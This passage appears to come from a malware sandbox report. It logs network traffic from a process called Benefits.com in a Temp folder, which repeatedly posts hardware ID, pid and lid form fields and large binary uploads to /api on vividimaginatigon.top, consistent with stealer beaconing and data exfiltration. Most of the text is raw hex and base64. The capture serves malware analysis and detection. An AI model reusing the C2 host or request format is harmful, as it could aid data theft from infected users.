                                    2025-01-31 18:55:28 UTC1369INData Raw: 4c 42 2b 77 52 79 66 5a 4c 2b 6f 76 72 6b 53 4e 49 30 69 41 67 35 53 78 53 6a 47 6c 44 47 6b 37 58 63 50 61 68 69 56 33 4c 62 4b 34 44 49 41 6e 42 50 6e 4f 6a 6f 35 4b 4e 63 6e 6a 36 44 54 32 34 4f 56 2b 70 5a 56 74 54 61 34 5a 4d 62 6f 58 74 52 4c 70 4e 71 6e 6f 30 57 50 45 69 64 70 62 71 6c 71 6c 75 58 4f 59 6c 4c 62 67 67 46 70 52 39 44 7a 4a 65 7a 77 54 43 6e 64 56 42 34 78 43 6d 48 78 51 52 77 58 5a 6a 6c 34 65 37 71 48 39 49 30 6e 41 67 35 53 7a 53 7a 44 31 76 4c 6c 71 2f 59 4f 36 39 6d 55 47 57 4a 5a 4d 48 53 43 47 30 50 79 66 50 79 38 71 31 4f 33 43 72 45 54 32 31 4c 54 2b 51 66 57 4d 71 64 76 39 30 6f 71 58 5a 53 65 73 41 6a 68 63 73 4d 66 45 75 56 34 75 66 6d 70 6c 71 56 4d 49 74 4d 61 41 55 65 71 31 6b 66 6a 4a 32 68 6b 32 4c 73 55 55 5a 32 78
                                    Data Ascii: LB+wRyfZL+ovrkSNI0iAg5SxSjGlDGk7XcPahiV3LbK4DIAnBPnOjo5KNcnj6DT24OV+pZVtTa4ZMboXtRLpNqno0WPEidpbqlqluXOYlLbggFpR9DzJezwTCndVB4xCmHxQRwXZjl4e7qH9I0nAg5SzSzD1vLlq/YO69mUGWJZMHSCG0PyfPy8q1O3CrET21LT+QfWMqdv90oqXZSesAjhcsMfEuV4ufmplqVMItMaAUeq1kfjJ2hk2LsUUZ2x
                                    2025-01-31 18:55:28 UTC1369INData Raw: 64 66 30 62 52 71 36 4c 69 73 68 48 4b 63 36 52 44 64 77 34 51 73 6c 74 6b 7a 35 53 33 31 43 7a 73 62 32 49 37 69 53 57 62 67 31 64 46 56 74 48 69 37 71 58 79 45 59 63 30 68 45 39 37 48 52 43 6f 43 46 72 42 6c 70 76 63 50 62 70 7a 55 6e 62 59 49 38 33 49 41 6a 77 42 30 65 4c 36 70 66 49 52 76 54 53 53 53 30 34 49 42 71 31 5a 48 34 79 64 72 35 4e 69 37 45 34 64 5a 38 6f 36 67 73 77 65 51 67 2f 4a 2f 4e 79 6c 6f 55 65 56 49 34 64 65 61 67 59 62 74 53 63 52 6c 4d 37 72 67 57 6a 2b 49 6b 49 31 31 68 58 50 67 77 34 38 46 36 6a 38 6f 76 50 71 43 63 42 39 78 46 6f 68 55 31 66 6a 47 6b 50 65 6e 4c 72 46 4f 65 74 4f 59 31 4c 66 49 49 62 54 43 47 74 41 30 61 75 69 36 75 6f 4a 71 33 4f 4e 54 33 6f 61 41 61 6b 4a 56 6f 79 6c 39 35 4d 69 37 43 67 64 51 4d 6f 6b 6a 38
                                    Data Ascii: df0bRq6LishHKc6RDdw4Qsltkz5S31Czsb2I7iSWbg1dFVtHi7qXyEYc0hE97HRCoCFrBlpvcPbpzUnbYI83IAjwB0eL6pfIRvTSSS04IBq1ZH4ydr5Ni7E4dZ8o6gsweQg/J/NyloUeVI4deagYbtScRlM7rgWj+IkI11hXPgw48F6j8ovPqCcB9xFohU1fjGkPenLrFOetOY1LfIIbTCGtA0aui6uoJq3ONT3oaAakJVoyl95Mi7CgdQMokj8
                                    2025-01-31 18:55:28 UTC1369INData Raw: 6b 75 44 6c 71 61 4a 41 6e 7a 2f 45 42 69 45 65 48 4b 67 66 58 4e 6e 56 71 4d 55 35 75 6e 63 52 66 64 67 6e 6a 59 4d 77 4d 67 2b 4a 70 62 71 6c 6e 31 4b 63 50 59 4e 65 63 45 59 33 72 78 56 53 77 4a 75 2b 6b 33 54 73 64 68 30 74 6d 6d 54 42 78 78 34 38 46 38 47 33 75 62 44 35 42 73 4a 68 6d 77 5a 34 53 77 48 6b 51 51 4f 43 32 71 75 54 59 75 77 33 58 6d 66 62 4c 49 4c 56 44 44 74 78 72 2b 54 76 36 75 5a 66 6d 54 4f 44 57 48 63 51 57 36 77 61 53 39 61 6b 68 2f 67 32 71 6e 64 48 63 73 38 4d 6f 59 4e 42 50 45 44 52 76 64 75 6c 34 68 47 74 66 63 52 51 49 56 4e 58 6b 52 70 66 77 70 32 76 77 6e 65 45 55 32 64 50 69 77 61 47 31 6b 31 49 53 49 48 30 36 65 69 6d 45 64 78 7a 67 67 67 35 57 31 6e 6b 48 55 43 4d 77 75 6d 42 59 66 6b 6a 43 69 57 62 4e 63 2f 61 54 32 6f
                                    Data Ascii: kuDlqaJAnz/EBiEeHKgfXNnVqMU5uncRfdgnjYMwMg+Jpbqln1KcPYNecEY3rxVSwJu+k3Tsdh0tmmTBxx48F8G3ubD5BsJhmwZ4SwHkQQOC2quTYuw3XmfbLILVDDtxr+Tv6uZfmTODWHcQW6waS9akh/g2qndHcs8MoYNBPEDRvdul4hGtfcRQIVNXkRpfwp2vwneEU2dPiwaG1k1ISIH06eimEdxzggg5W1nkHUCMwumBYfkjCiWbNc/aT2o
                                    2025-01-31 18:55:28 UTC1369INData Raw: 4b 57 31 48 34 74 7a 6b 67 67 35 57 46 6e 6b 43 78 47 55 32 76 37 64 4e 36 31 7a 55 33 62 62 4f 49 66 41 47 58 38 49 72 39 76 48 36 4b 64 55 6e 44 53 36 64 6b 41 42 42 36 6b 57 56 6f 36 36 76 73 55 35 6b 6b 35 71 5a 4d 34 36 77 2b 55 4d 61 6b 7a 52 71 36 4c 39 36 67 6e 53 45 6f 35 59 62 41 51 51 35 6a 6c 57 32 70 6e 35 6e 58 71 6f 4d 41 55 31 37 43 65 4d 78 67 46 37 44 62 44 76 38 75 69 6c 56 74 41 54 67 31 35 69 53 31 6e 6b 46 52 47 55 32 72 6a 5a 4b 71 46 2f 57 6a 6e 4f 4d 49 61 44 51 54 78 42 30 62 32 69 35 4b 42 42 6e 7a 79 44 42 47 63 46 47 65 51 47 48 39 58 61 72 35 4e 69 2f 7a 34 64 5a 34 6c 79 77 59 51 4d 62 6c 32 58 35 76 54 6d 37 57 2b 73 48 70 5a 50 63 51 68 56 6c 52 52 56 32 6f 2b 36 77 7a 32 53 54 6e 42 6e 7a 6a 71 43 67 54 35 71 54 4a 48 72
                                    Data Ascii: KW1H4tzkgg5WFnkCxGU2v7dN61zU3bbOIfAGX8Ir9vH6KdUnDS6dkABB6kWVo66vsU5kk5qZM46w+UMakzRq6L96gnSEo5YbAQQ5jlW2pn5nXqoMAU17CeMxgF7DbDv8uilVtATg15iS1nkFRGU2rjZKqF/WjnOMIaDQTxB0b2i5KBBnzyDBGcFGeQGH9Xar5Ni/z4dZ4lywYQMbl2X5vTm7W+sHpZPcQhVlRRV2o+6wz2STnBnzjqCgT5qTJHr


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.549876172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:29 UTC286OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=4RB73AYMHFAM9Q3E3
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 12830
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:29 UTC12830OUTData Raw: 2d 2d 34 52 42 37 33 41 59 4d 48 46 41 4d 39 51 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 34 52 42 37 33 41 59 4d 48 46 41 4d 39 51 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 52 42 37 33 41 59 4d 48 46 41 4d 39 51 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a
                                    Data Ascii: --4RB73AYMHFAM9Q3E3Content-Disposition: form-data; name="hwid"44EC141B1568AD4137A891171E8607C0--4RB73AYMHFAM9Q3E3Content-Disposition: form-data; name="pid"2--4RB73AYMHFAM9Q3E3Content-Disposition: form-data; name="lid"c2CoW0--cheksa
                                    2025-01-31 18:55:32 UTC1131INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=1jgb501okcpd7ooml28jl7v57m; expires=Sat, 01 Feb 2025 18:55:29 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPFYD0OcEgB4%2BeeE0sbIYNQgWWyW2HKzyJfIFkiAAkd7JXIdLZFwiFkPum33KxR02o2t6u7CZVcNLPMRFbfI2EaBgnMTEk1VZxXCL5ecN5Cp2ApNTV2%2BK22CsxiIWmH3gfCusZ25MYM%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abea927cb14217-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1772&rtt_var=673&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2854&recv_bytes=13774&delivery_rate=1615938&cwnd=242&unsent_bytes=0&cid=3cd7c57464e41bdb&ts=2939&x=0"
                                    2025-01-31 18:55:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-01-31 18:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.549897172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:33 UTC283OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=0KQEZWD6WNG4BI
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 15054
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:33 UTC15054OUTData Raw: 2d 2d 30 4b 51 45 5a 57 44 36 57 4e 47 34 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 30 4b 51 45 5a 57 44 36 57 4e 47 34 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 4b 51 45 5a 57 44 36 57 4e 47 34 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 30 4b 51 45 5a 57 44
                                    Data Ascii: --0KQEZWD6WNG4BIContent-Disposition: form-data; name="hwid"44EC141B1568AD4137A891171E8607C0--0KQEZWD6WNG4BIContent-Disposition: form-data; name="pid"2--0KQEZWD6WNG4BIContent-Disposition: form-data; name="lid"c2CoW0--cheksa--0KQEZWD
                                    2025-01-31 18:55:33 UTC1135INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=ku70r9da182q4edrta153n7l1g; expires=Sat, 01 Feb 2025 18:55:33 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrMbuI1HBkqR5TlOduKXa53LDHRxM4Y5KzvJWn5fja4Cpno60SoIzhTidwOzYKGE3q5DEwrPPyo7h1lpn28eFxOpC1b7r54cXx%2FH7oK%2BGjtYJCnsa8y%2BPdwJFNbrnLXgvbCfW%2Bfi65E%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abeaa7cfd9de95-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1669&rtt_var=685&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2852&recv_bytes=15995&delivery_rate=1749550&cwnd=248&unsent_bytes=0&cid=85e918b185407c2c&ts=691&x=0"
                                    2025-01-31 18:55:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-01-31 18:55:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.549908172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:34 UTC282OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=RWPJQ4XWK3D3P
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20538
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:34 UTC15331OUTData Raw: 2d 2d 52 57 50 4a 51 34 58 57 4b 33 44 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 52 57 50 4a 51 34 58 57 4b 33 44 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 57 50 4a 51 34 58 57 4b 33 44 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 52 57 50 4a 51 34 58 57 4b 33
                                    Data Ascii: --RWPJQ4XWK3D3PContent-Disposition: form-data; name="hwid"44EC141B1568AD4137A891171E8607C0--RWPJQ4XWK3D3PContent-Disposition: form-data; name="pid"3--RWPJQ4XWK3D3PContent-Disposition: form-data; name="lid"c2CoW0--cheksa--RWPJQ4XWK3
                                    2025-01-31 18:55:34 UTC5207OUTData Raw: ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: Wun 4F([:7s~X`nO`i
                                    2025-01-31 18:55:35 UTC1139INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=en8k7ru00pnku51us4qs3v7grm; expires=Sat, 01 Feb 2025 18:55:34 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2B7wsazjXSF3npWObEldTy%2BRggyD%2FXlWWdTEJ%2Ftu6ZuFhdpiY%2FRn1bTrVOm2B7Ph62sq5UBiYyAuwazDH0x20jtA53OP1aaBLLtINCh6kOUjUEMLy6AsMK0L%2BeScFvrYD22zzBtm8qs%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abeaaf999a41f5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1672&rtt_var=645&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2853&recv_bytes=21500&delivery_rate=1671436&cwnd=201&unsent_bytes=0&cid=5353ee942851bec1&ts=795&x=0"
                                    2025-01-31 18:55:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-01-31 18:55:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.549916172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:35 UTC282OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=DYU7H78V6PGXDQ
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 2448
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:35 UTC2448OUTData Raw: 2d 2d 44 59 55 37 48 37 38 56 36 50 47 58 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 44 59 55 37 48 37 38 56 36 50 47 58 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 59 55 37 48 37 38 56 36 50 47 58 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 0d 0a 2d 2d 44 59 55 37 48 37 38
                                    Data Ascii: --DYU7H78V6PGXDQContent-Disposition: form-data; name="hwid"44EC141B1568AD4137A891171E8607C0--DYU7H78V6PGXDQContent-Disposition: form-data; name="pid"1--DYU7H78V6PGXDQContent-Disposition: form-data; name="lid"c2CoW0--cheksa--DYU7H78
                                    2025-01-31 18:55:36 UTC1133INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=j4kqu5efsmei0r5n0maiift6kf; expires=Sat, 01 Feb 2025 18:55:35 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXF9xRYB6zcAR7bj27ZdZ7YBMW39gsK%2BgXZVvumz353Spg9KutZS36IRhiOZ0fniFtqhRcoFGfFfBvZpklz%2BVj1taJHUbqZPjVndoIoA3dX%2FVe%2FEOaDhzOMKYKY3ALFY8iIjanojdaY%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abeab83f9f4289-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=2561&min_rtt=1761&rtt_var=1232&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2853&recv_bytes=3366&delivery_rate=1658148&cwnd=150&unsent_bytes=0&cid=a51562fee36e9fbc&ts=488&x=0"
                                    2025-01-31 18:55:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-01-31 18:55:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.549926172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:37 UTC288OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=P5C22XRYO9WSL2U94D
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 551900
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 2d 2d 50 35 43 32 32 58 52 59 4f 39 57 53 4c 32 55 39 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30 0d 0a 2d 2d 50 35 43 32 32 58 52 59 4f 39 57 53 4c 32 55 39 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 35 43 32 32 58 52 59 4f 39 57 53 4c 32 55 39 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73
                                    Data Ascii: --P5C22XRYO9WSL2U94DContent-Disposition: form-data; name="hwid"44EC141B1568AD4137A891171E8607C0--P5C22XRYO9WSL2U94DContent-Disposition: form-data; name="pid"1--P5C22XRYO9WSL2U94DContent-Disposition: form-data; name="lid"c2CoW0--cheks
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: b0 96 e1 c5 0c 44 9e 9d cc 54 03 a1 bc aa 4f 7a 4d 6d ea 6f 91 42 74 e0 0f ac a4 45 40 a6 f1 ff 92 53 82 aa 7c af 77 7e d9 23 d2 16 42 0e 0f 93 82 0a 63 0c 50 ba 0d b8 9f 4e 36 cd 19 94 5c 39 70 79 c9 5a 3a 6c 8f 06 6f fd f9 00 1e 36 25 7a e0 16 a9 3f a4 a4 13 55 61 d3 67 9d 5e 7a 11 df 30 22 63 24 bd fc 12 4d 4e 0d d6 5b ff b8 7b a7 e4 fd e2 0d 30 01 46 c6 3b ac a8 11 1e d1 3c c2 b8 5b fb d3 50 06 e5 af de 92 e7 87 5a 04 62 5f 35 2d d8 16 cb f7 45 0c b7 59 81 cc 18 2a 2f 5e ab 49 45 43 da 72 48 c1 d6 4f 17 81 63 ce b0 4f c7 f5 cc fb 97 1b 39 bd 37 62 cf 55 29 7f 1e b3 a1 5e 32 d7 21 2c 51 a2 f1 fb 6a 47 ec 92 9c 4f 77 85 18 25 63 23 03 cf 6b 0a 3d af 4e 95 4f ad 0b 38 d0 64 c1 6b 90 1b 93 39 bb 3b 60 d7 5d 68 9f 52 c3 61 d8 dd 45 1c 04 39 57 bf 51 40 83
                                    Data Ascii: DTOzMmoBtE@S|w~#BcPN6\9pyZ:lo6%z?Uag^z0"c$MN[{0F;<[PZb_5-EY*/^IECrHOcO97bU)^2!,QjGOw%c#k=NO8dk9;`]hRaE9WQ@
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 95 48 e7 4d b5 c6 3b 74 a3 8b 9a 29 7c 5d e2 f7 35 b8 93 0d 88 68 af bb 18 5c 78 3c a1 59 75 25 80 8e 5d df 80 61 11 58 8e 22 1b 53 5c 3f be bf 51 01 a5 9b 35 11 14 a2 df 37 a2 ff 81 db b2 2c de 03 93 92 44 3b 08 a8 73 a8 4b f7 f4 5c da 8a f6 dd 25 ee 5b 75 74 37 6b aa ba 86 4a 11 8f 79 84 d6 0d d3 a6 df 2e 96 d3 ba 6d a8 79 e9 dd 46 9a 96 a4 83 4a 4c b1 a9 0d 01 36 b3 a6 81 30 1c 11 d5 f7 43 d6 2c d2 d4 94 f2 bc 4c 49 e8 c7 1d 5a a3 f8 87 c6 aa 63 27 cd 1a fb 0c a6 88 1f f2 b9 64 d2 9d 0f 0a 9a 87 43 86 88 6d 1f 43 be 4c 1b 54 23 43 9d 20 e8 80 32 2e 8f 50 d7 0d 8d cc 35 89 da a3 9f b3 63 5b d8 1d 10 fa b2 7f e7 4b fe 32 8c 5b e4 04 ea 95 bb 9c 7c 0e cf 54 71 9d 17 4a 8b 77 bc 38 9e 2d b2 3a af a5 37 26 77 34 58 61 20 54 5d 26 2f e6 9a 2a 62 64 c3 02 f0
                                    Data Ascii: HM;t)|]5h\x<Yu%]aX"S\?Q57,D;sK\%[ut7kJy.myFJL60C,LIZc'dCmCLT#C 2.P5c[K2[|TqJw8-:7&w4Xa T]&/*bd
